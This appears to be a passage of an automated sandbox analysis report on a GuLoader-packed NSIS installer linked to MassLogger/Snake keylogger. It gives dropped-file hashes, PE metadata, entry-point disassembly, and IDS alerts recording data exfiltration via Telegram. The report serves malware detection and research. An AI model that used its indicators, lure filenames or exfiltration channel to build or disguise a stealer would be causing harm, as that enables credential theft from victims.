	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	172.217.18.97 142.250.181.238
	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.217.18.97 142.250.181.238
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
	ht58337iNC.exe	Get hash	malicious	GuLoader	Browse	172.217.18.97 142.250.181.238
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Unknown	Browse
	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
Category:	dropped
Size (bytes):	484658
Entropy (8bit):	7.809711763657168
Encrypted:	false
SSDEEP:	12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
MD5:	5C727AE28F0DECF497FBB092BAE01B4E
SHA1:	AADE364AE8C2C91C6F59F85711B53078FB0763B7
SHA-256:	77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
SHA-512:	5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
Malicious:	false
Reputation:	low
Preview:	......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"

C:\Users\user\AppData\Local\Iw\Countryfiedness.Vit

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	data
Category:	dropped
Size (bytes):	142743
Entropy (8bit):	4.60268621251581
Encrypted:	false
SSDEEP:	3072:hs8O5cvIV2iWFYknDWvRClhEa+DVRL4QF:hnvzHF1DiAEVfLb
MD5:	C085566A5550ECF615CF77E61B6A66FA
SHA1:	F6F56FE963EC12CB1508B0FE6F6A27AD3EB5661B
SHA-256:	6070C266CCF07F84931682B07EB44F0F9E7FD4CC8627D63FA7134CED8F95D156
SHA-512:	2FF81AFAFD17F6EC45B2F3900D6C70D0439989C2A253F0738C7CDF02CD9E82AF4E8AD4023074CFD72BBFB9C0DF5986C2BD63C8DE952E1911A620B5B2E0BA4221
Malicious:	false
Reputation:	low
Preview:	..##....WW.55555...........x..................WW.'.....B...............................666.........888...........f.\|\|............ff.ff.......!!...((..q....1.<...................................................sss.......BBBB......'.*........................................................dddddd...cc....................BBB.....e....................@....8.t.aaa...........!!!!................55.888888........}.....L.p......G.......AA............E.y...............}}}.j.......h................___.....II.................::.@...P.........................................tttt........@.......2.............<<<<<<<........(.....m...}}}}..................>>.......................a.HHH........................jj.............`.1..............JJJ.t.uu........qq..e............bb...RR.......2..C..............nn...8........^...................>>>.hh.........QQQ.........kkk.QQ..................~~...............{....................lllll....."..FF.==.............y.W...........\|.Z.....P.#.....................

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	data
Category:	dropped
Size (bytes):	112291
Entropy (8bit):	1.249420131631438
Encrypted:	false
SSDEEP:	768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
MD5:	4D1D72CFC5940B09DFBD7B65916F532E
SHA1:	30A45798B534842002B103A36A3B907063F8A96C
SHA-256:	479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
SHA-512:	048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
Malicious:	false
Reputation:	low
Preview:	..........P............+......................................................................................................................X......n..(................G...................................m.........\|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	data
Category:	dropped
Size (bytes):	362089
Entropy (8bit):	1.23992084267325
Encrypted:	false
SSDEEP:	768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
MD5:	A4340182CDDD2EC1F1480360218343F9
SHA1:	50EF929FEA713AA6FCC05E8B75F497B7946B285B
SHA-256:	B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
SHA-512:	021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
Malicious:	false
Reputation:	low
Preview:	..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......\|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............

C:\Users\user\AppData\Local\Iw\anpartsrederi.udg

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	data
Category:	dropped
Size (bytes):	284986
Entropy (8bit):	7.795442726158851
Encrypted:	false
SSDEEP:	6144:leI2gIPbvgTiiaOhIW3D1/8d7evTfW5BfuRLZ3DI4kMAoeyBRx:zxIDgTYgIUl8d7s7MyL5dAoDn
MD5:	D3C766A5AA9FAB3E7F9E530676219359
SHA1:	E554311EF05FFF6AD6C04E2BE83EA958EBBCDF50
SHA-256:	42C2D36EEA6FAB6B4703F9403DA0E8B4807B4C6E8D99C3CC685A4DD52166AD8E
SHA-512:	4657655963D458452251F0BE67682CCEC1D9639290F1DB9593C870689A1A512C72188FC71ACB741B365386C8B785B86614DEFDECE4F64F3A1F2D69714ED916BD
Malicious:	false
Reputation:	low
Preview:	.....5555..............v..........>>>............f......@...................rr....6...PPPP......B............QQQ...../.................................DDDDD.............YYY.....>>>....................'.........>............E.PPPP......................TT...........MMM....................5..5.........{........xx......................w......8...X.......G.............................>...............................................v........[[.........r...EEE......333......o....:...................ssss..........<..........\|\|\|\|\|.......................................e...........WW.........B......^.......XX.....&&.......8.............`.fff...................**........................OO...PP.p...............II....!!!!...oo..................... ..7.......................JJJ....................................''''..........hh.\|..UUUUU..V...........g................D.uu.....I....OOOO.....iii..................!...zz...3333...@@@@@..MM...D.C..........%%......]]]]]]..O.R..q...............N.$....wwwww

C:\Users\user\AppData\Local\Iw\prepares.pli

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
Category:	dropped
Size (bytes):	139354
Entropy (8bit):	1.2473328695625903
Encrypted:	false
SSDEEP:	768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
MD5:	B0FB6B583D6902DE58E1202D12BA4832
SHA1:	7F585B5C3A4581CE76E373C78A6513F157B20480
SHA-256:	E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
SHA-512:	E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
Malicious:	false
Preview:	.......................................\|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........

C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 6mGpn6kupm.exe, Detection: malicious, Browse Filename: v4nrZtP7K2.exe, Detection: malicious, Browse Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse Filename: 4UQ5wnI389.exe, Detection: malicious, Browse Filename: ajRZflJ2ch.exe, Detection: malicious, Browse Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse Filename: KO0q4biYfC.exe, Detection: malicious, Browse Filename: Yoranis Setup.exe, Detection: malicious, Browse Filename: Yoranis Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsj15BE.tmp

Download File

Process:	C:\Users\user\Desktop\2CQ2zMn0hb.exe
File Type:	data
Category:	dropped
Size (bytes):	1552308
Entropy (8bit):	5.454840358491344
Encrypted:	false
SSDEEP:	24576:ASDgIUt7MyLfDAo3xX3y4bz2lWwWo6rSTZyqI:A8aFMIAoBXbz2luo6rS1yh
MD5:	11F46E3ED02F0A34FD135D31ACD8073A
SHA1:	B6BA86818AA25B4447ED4ADEB723B47EB2632713
SHA-256:	2540431A79510D55BFE626D2EA6913C0C8A4ECBBC1BF2A0B78839BFA7619D063
SHA-512:	6A6A51F0EB0B910D3A6975FB07602BDD0B81C2FD18F758A9C53320BFF99BBF4058FCC8D2D95A72883242B3682C7B2DE17994BC9C0C8492E364F70F659AE2786F
Malicious:	false
Preview:	$6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.961456422421853
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2CQ2zMn0hb.exe
File size:	1'052'225 bytes
MD5:	57a8326258e722638fdfab7715e94356
SHA1:	ae16c7ecb431ad5775bd0b00c39117756431422b
SHA256:	df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f
SHA512:	9fbf9f21a79a7b02aeb4a51c54394a67ed9d394b0895c4c6f3c9022e6631c1f66f63e2df0eefcbd64164e9b949a001746bf14c2648dfd2f691e673d62cf2b8a3
SSDEEP:	24576:9jwKCNucluh8HfWRd7aEIRYO0sCaHfToikFhZD1fJAj1:V1CVqyfi7a2O0RniAZD/a1
TLSH:	29253309B263EE2BE9945E74AE0AC4FAF8DB8D031C44B48727B0365E7A72275C51F354
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	46224e4c19391d03

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F8418EC6C73h
push ebx
call 00007F8418EC9F3Dh
cmp eax, ebx
je 00007F8418EC6C69h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F8418EC9EB7h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F8418EC6C4Ch
push 0000000Ah
call 00007F8418EC9F10h
push 00000008h
call 00007F8418EC9F09h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F8418EC9EFDh
cmp eax, ebx
je 00007F8418EC6C71h
push 0000001Eh
call eax
test eax, eax
je 00007F8418EC6C69h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x21068	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x21068	0x21200	03ed2ed76ba15352dac9e48819696134	False	0.8714696344339623	data	7.556190648348207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x554c0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x55828	0xc2a3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9966684729162903
RT_ICON	0x61ad0	0x86e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.990210843373494
RT_ICON	0x6a1b0	0x5085	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9867559307233299
RT_ICON	0x6f238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4358921161825726
RT_ICON	0x717e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4896810506566604
RT_ICON	0x72888	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5367803837953091
RT_ICON	0x73730	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6913357400722022
RT_ICON	0x73fd8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.38597560975609757
RT_ICON	0x74640	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.4934971098265896
RT_ICON	0x74ba8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.651595744680851
RT_ICON	0x75010	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.46908602150537637
RT_ICON	0x752f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5472972972972973
RT_DIALOG	0x75420	0x120	data	English	United States	0.53125
RT_DIALOG	0x75540	0x118	data	English	United States	0.5678571428571428
RT_DIALOG	0x75658	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x75778	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x75870	0xa0	data	English	United States	0.6125
RT_DIALOG	0x75910	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x75970	0xae	data	English	United States	0.6091954022988506
RT_VERSION	0x75a20	0x308	data	English	United States	0.47036082474226804
RT_MANIFEST	0x75d28	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T21:53:22.884979+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49827	142.250.181.238	443	TCP
2025-01-10T21:53:28.377864+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49861	132.226.247.73	80	TCP
2025-01-10T21:53:35.049704+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49861	132.226.247.73	80	TCP
2025-01-10T21:53:35.731626+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49912	149.154.167.220	443	TCP
2025-01-10T21:53:35.981783+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49912	149.154.167.220	443	TCP
2025-01-10T21:53:36.877827+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49919	132.226.247.73	80	TCP
2025-01-10T21:53:37.461511+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49924	149.154.167.220	443	TCP
2025-01-10T21:53:37.974563+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49924	149.154.167.220	443	TCP
2025-01-10T21:53:39.482257+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49939	149.154.167.220	443	TCP
2025-01-10T21:53:39.734489+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49939	149.154.167.220	443	TCP
2025-01-10T21:53:41.069098+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49952	149.154.167.220	443	TCP
2025-01-10T21:53:41.380977+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49952	149.154.167.220	443	TCP
2025-01-10T21:53:42.706837+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49966	149.154.167.220	443	TCP
2025-01-10T21:53:43.120484+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49966	149.154.167.220	443	TCP
2025-01-10T21:53:44.469261+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49978	149.154.167.220	443	TCP
2025-01-10T21:53:44.827470+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49978	149.154.167.220	443	TCP
2025-01-10T21:53:46.165705+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T21:53:46.523696+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T21:53:47.899210+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T21:53:48.307274+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T21:53:49.714041+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T21:53:50.162912+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T21:53:51.487456+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T21:53:51.745783+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T21:53:53.072656+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50000	149.154.167.220	443	TCP
2025-01-10T21:53:53.521129+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50000	149.154.167.220	443	TCP
2025-01-10T21:53:54.852859+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50002	149.154.167.220	443	TCP
2025-01-10T21:53:55.218536+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50002	149.154.167.220	443	TCP
2025-01-10T21:53:56.551895+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T21:53:56.899911+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T21:53:58.235121+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T21:53:58.626572+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50006	149.154.167.220	443	TCP
